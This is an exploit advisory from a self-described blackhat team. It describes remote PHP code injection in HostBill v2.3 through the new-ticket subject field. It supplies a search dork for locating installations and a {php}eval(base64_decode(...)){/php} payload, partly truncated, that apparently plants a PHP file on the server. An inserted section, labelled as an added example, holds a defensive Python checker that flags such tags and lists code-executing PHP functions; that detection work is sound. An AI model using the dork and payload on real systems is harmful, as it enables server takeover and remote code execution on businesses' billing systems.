=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah, The Most Beneficent, The Most Merciful}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Type: Remote PHP code injection
[~] Vendor: hostbillapp.com
[+] Software: HostBill
[+] Version: v2.3
[~]
[+] Author: Dr.DaShE
[~] TEAM: Team 403
[?]
[-] contact: Dasher403[at]gmail.com
[?] Date: 2g.J4N.2oll
[?]
[?] T!ME: 04:46 AM ara-blackhat
[^]
[?]
===============================================================================
# HostBill script: remote PHP code injection exploit
===============================================================================
[!] Exploit already tested on an Apache Linux server
Dork: Powered by HostBill
[^] Error console:
http://localhost/billing/index.php?/tickets/new/
[?] PoC exploit:
http://localhost/billing/index.php?/tickets/new/
Put the PHP code in the subject field of the new ticket form,
encoded with a base64 encoder.
Example:
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq...'));{/php}
http://localhost/Dasher.php
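
A defender-side check for the injection above, added here as an example and not part of the original advisory or HostBill's code: it flags {php} blocks in a ticket field, decodes base64 arguments for triage, and neutralizes the braces. It assumes the subject is evaluated by a Smarty-style template engine (which the {php} tags in the PoC imply) and later rendered as HTML; inspect_field, neutralize and the sample subjects are hypothetical.

```python
import base64
import binascii
import re

# Any opening or closing Smarty-style php tag, tolerant of case and spacing.
PHP_TAG = re.compile(r"\{\s*/?\s*php\s*\}", re.IGNORECASE)
# A complete {php} ... {/php} block; group 1 is the PHP source inside it.
PHP_BLOCK = re.compile(r"\{\s*php\s*\}(.*?)\{\s*/\s*php\s*\}", re.IGNORECASE | re.DOTALL)
# Calls that execute code or commands, or write files.
EXEC_CALL = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec|file_put_contents)\s*\(",
    re.IGNORECASE)
# String literal passed to base64_decode(), as in the PoC.
B64_ARG = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]*)['\"]", re.IGNORECASE)


def inspect_field(value):
    """Triage one user-supplied ticket field (hypothetical helper)."""
    report = {"php_tag": bool(PHP_TAG.search(value)), "exec_calls": [], "decoded": []}
    for body in PHP_BLOCK.findall(value):
        calls = {m.group(1).lower() for m in EXEC_CALL.finditer(body)}
        report["exec_calls"] = sorted(set(report["exec_calls"]) | calls)
        for arg in B64_ARG.findall(body):
            try:
                raw = base64.b64decode("".join(arg.split()), validate=True)
            except (binascii.Error, ValueError):
                continue  # truncated or malformed blob: the tag alone still flags it
            report["decoded"].append(raw.decode("utf-8", "replace"))
    return report


def neutralize(value):
    """Replace template delimiters with HTML entities before storage/rendering."""
    return value.replace("{", "&#123;").replace("}", "&#125;")


# Constructed sample subjects (not taken from real traffic).
SAMPLES = [
    "{php}eval(base64_decode('cGhwaW5mbygpOw=='));{/php}",  # decodes to phpinfo();
    "{ PHP }eval(base64_decode('JGNvZGUgP'));{ /php }",      # truncated blob
    "Question about invoice {2011}",                         # benign braces
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(inspect_field(s), "->", neutralize(s))
```
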
[~]-----------------------------{(Team 403)}------------------------------------------------
#
[~] Greetz tO:Nex & WeeD & R3d D3v!L & HITLR & Red virus & Dr.Dmar & MaFiA & Mr.NsaaNy & ...etc ;
#
[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ;
#
[?] special SupPoRT : ABH-Sec.Com & packet storm & 1337day & Maksymilian Arciemowicz # ;
#
[~]spechial FR!ND: they all are spechials ;) #;
#
[~] !'M 4R48!4N 3XPL0!73R. #;
#
[~](>D!R 4ll 0R D!E<) #;
#
[~]---------------------------------------------------------------------------------------------